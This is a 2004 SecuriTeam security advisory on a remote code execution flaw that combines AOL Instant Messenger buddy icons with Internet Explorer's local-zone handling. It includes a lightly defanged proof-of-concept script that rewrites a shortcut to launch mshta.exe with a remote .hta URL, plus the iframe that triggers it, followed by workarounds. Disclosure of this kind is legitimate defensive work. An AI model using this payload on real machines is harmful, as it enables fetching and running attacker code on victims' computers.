[NT] AOL Instant Messenger/Microsoft Internet Explorer Remote Code Execution

From: SecuriTeam (support_at_securiteam.com)
Date: 02/23/04

  • Next message: SecuriTeam: "[EXPL] GateKeeper Pro Buffer Overflow (Long URL)" 
    To: list@securiteam.com
Date: 23 Feb 2004 19:24:31 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      AOL Instant Messenger/Microsoft Internet Explorer Remote Code Execution
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.aim.com/> AOL instant Messenger (AIM) service is a free
    online service that lets you communicate with family, friends and
    co-workers in real time. Using the AIM Buddy List? feature you can see
    when your buddies are online and available to instant message."

    There is a problem in Internet Explorer where a file can be displayed as
    HTML even though it is not an HTML file. The file can be run in the My
    Computer zone which has less restrictions. AIM buddy icons can be used to
    upload a file into a permanent and known location on a victim's hard drive
    which can then be "executed" by directing the victim to a page that
    launches the file.

    DETAILS

    Vulnerable Systems:
     * Microsoft Windows XP Pro
     * Microsoft Windows XP Home
     * Microsoft Windows 2003 Server Enterprise
     * AOL Instant Messenger versions 4.3 up to 5.5
     * Internet Explorer 6.0, possibly prior

    Using a 3rd party AOL Instant Messenger client one can import a file that
    uses local HTML execution code. For instance, the contents of such file
    might be:

    < scr!pt>
    var ok = new ActiveXObject("Shell.Application");
    f = ok.NameSpace("C:\\Documents and Settings\\All Users\\Start
    Menu\\Programs\\Accessories");
    i= f.ParseName("Paint.lnk");
    l = i.GetLink;
    l.Path = "mshta.exe"
    l.Arguments ="http://www.high-pow-er.com/ok.hta"
    l.Save("C:\\paint.lnk");
    ok.Open("C:\\paint.lnk");
    < /scr!pt>

    Note: The SCRIPT tag has been replaced with scr!pt for security reasons.

    Sending an instant message to ANOTHER name on a real AOL Instant Messenger
    client. Sending to yourself first might expedite the icon being sent. In
    any event, the victim (could be the same user) has to be on the buddy list
    before the vulnerability can surface. The file is written to the following
    known location:

    c:\documents and settings\username\application data\aim\bartcache\1\

    One can verify that the icon is in fact the HTML by opening it with
    Notepad. The filename is permanent for every AOL user every time the icon
    is imported. The consequences of this is that one can upload a file to the
    victim's machine knowing fully that the file is not what it is supposed to
    be and it's exact location on the hard drive.

    An HTML page created using the following code can be used to run the HTML
    file on the victim's machine, taking advantage of the Internet Explorer
    vulnerability:

    < !frame src="shell:appdata\aim\bartcache\1\file name you got from
    step2">< /!frame>

    Note: The IFRAME tag has been replaced with !frame for security reasons.

    The file name and location is fixed for all AOL users. Now it is a simple
    matter of directing the victim to the proper web page, perhaps by sending
    a hyperlink to the malicious page. The result is the "HTML" file being
    executed on the victim's machine and thus arbitrary code execution occurs.

    Workarounds
     * Turn off buddy icons in My Aim > Edit Options > Edit Preferences >
    Buddy Icons
     * Disable scripting in Internet Explorer (this might cause IE not to
    render many webpages properly)

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:mike@alanpickel.com> Michael
    Evanchik.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] GateKeeper Pro Buffer Overflow (Long URL)"

    Relevant Pages